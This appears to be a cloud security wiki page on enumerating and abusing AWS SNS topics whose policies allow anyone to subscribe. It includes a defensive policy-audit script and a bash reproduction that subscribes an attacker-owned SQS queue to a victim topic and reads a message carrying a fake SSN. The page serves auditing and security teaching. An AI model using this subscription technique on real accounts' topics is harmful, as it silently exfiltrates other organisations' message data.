AWS - SNS Unauthenticated Enum
SNS
For more information about SNS, check:
Open to All
When you configure an SNS topic from the web console, it is possible to indicate that Everyone can publish and subscribe to the topic.
So, if you find the ARN of topics inside the account (or by brute forcing potential topic names), you can check whether you can publish or subscribe to them.
This is equivalent to an SNS topic resource policy that allows sns:Subscribe to * (or to external accounts): any principal can create a subscription that delivers all future messages of the topic to an SQS queue it owns. When the queue owner initiates the subscription, no human confirmation is required for SQS endpoints.
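To audit your own topics for the policy shape described above, the following added example (not part of the original page) parses a topic policy document and reports Allow statements that grant sns:Subscribe or sns:Publish to everyone or to another account. The function name `audit_topic_policy`, the account IDs and the sample policies are assumptions constructed for illustration.

```python
import fnmatch
import json

RISKY = ("sns:Subscribe", "sns:Publish")

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _account_of(principal):
    # "arn:aws:iam::111122223333:root" -> "111122223333"; bare account ids pass through
    return principal.split(":")[4] if principal.startswith("arn:") else principal

def audit_topic_policy(policy_json, owner_account):
    """Return (sid, action, exposure) for Allow statements that let anyone,
    or another account, publish or subscribe to the topic."""
    findings = []
    for stmt in _as_list(json.loads(policy_json).get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        aws = _as_list(principal.get("AWS", [])) if isinstance(principal, dict) else [principal]
        if "*" in aws:
            # A Condition (aws:SourceOwner, aws:PrincipalOrgID, ...) may still narrow "*"
            exposure = "public-conditional" if stmt.get("Condition") else "public"
        elif any(_account_of(p) != owner_account for p in aws):
            exposure = "cross-account"
        else:
            continue
        for pattern in _as_list(stmt.get("Action", [])):
            for risky in RISKY:
                # IAM action names are case-insensitive and may use wildcards
                if fnmatch.fnmatchcase(risky.lower(), pattern.lower()):
                    findings.append((stmt.get("Sid", ""), risky, exposure))
    return findings

# Constructed sample policies (account ids and ARNs are placeholders)
TOPIC = "arn:aws:sns:us-east-1:111122223333:example-topic"
OPEN_SUBSCRIBE = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "OpenSubscribe", "Effect": "Allow", "Principal": "*",
     "Action": "sns:Subscribe", "Resource": TOPIC}]})
OWNER_ONLY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "Default", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["SNS:Publish", "SNS:Subscribe"], "Resource": TOPIC,
     "Condition": {"StringEquals": {"AWS:SourceOwner": "111122223333"}}}]})

if __name__ == "__main__":
    for name, doc in (("open", OPEN_SUBSCRIBE), ("owner-only", OWNER_ONLY)):
        print(name, audit_topic_policy(doc, "111122223333"))
```

A `public-conditional` finding still needs a manual read of the Condition block, since the check only records that one exists and does not evaluate it.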
Reproduction (us-east-1)
```bash
REGION=us-east-1

# Victim account (topic owner)
VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)

# Open the topic to anyone subscribing
cat > /tmp/topic-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"OpenSubscribe","Effect":"Allow","Principal":"*","Action":"sns:Subscribe","Resource":"$VICTIM_TOPIC_ARN"}]}
JSON
aws sns set-topic-attributes --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --attribute-name Policy --attribute-value file:///tmp/topic-policy.json

# Attacker account (queue owner)
ATTACKER_Q_URL=$(aws sqs create-queue --queue-name attacker-exfil-queue-$(date +%s) --region $REGION --query QueueUrl --output text)
ATTACKER_Q_ARN=$(aws sqs get-queue-attributes --queue-url "$ATTACKER_Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# Allow the victim topic to send to the attacker queue
cat > /tmp/sqs-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowVictimTopicSend","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"sqs:SendMessage","Resource":"$ATTACKER_Q_ARN","Condition":{"ArnEquals":{"aws:SourceArn":"$VICTIM_TOPIC_ARN"}}}]}
JSON
aws sqs set-queue-attributes --queue-url "$ATTACKER_Q_URL" --region $REGION --attributes Policy="$(cat /tmp/sqs-policy.json)"

# Subscribe the attacker queue to the victim topic (auto-confirmed for SQS)
SUB_ARN=$(aws sns subscribe --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --protocol sqs --notification-endpoint "$ATTACKER_Q_ARN" --query SubscriptionArn --output text)

# Validation: publish and receive
aws sns publish --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --message '{pii:ssn:123-45-6789}'
aws sqs receive-message --queue-url "$ATTACKER_Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 10 --query 'Messages[0].Body' --output text
```

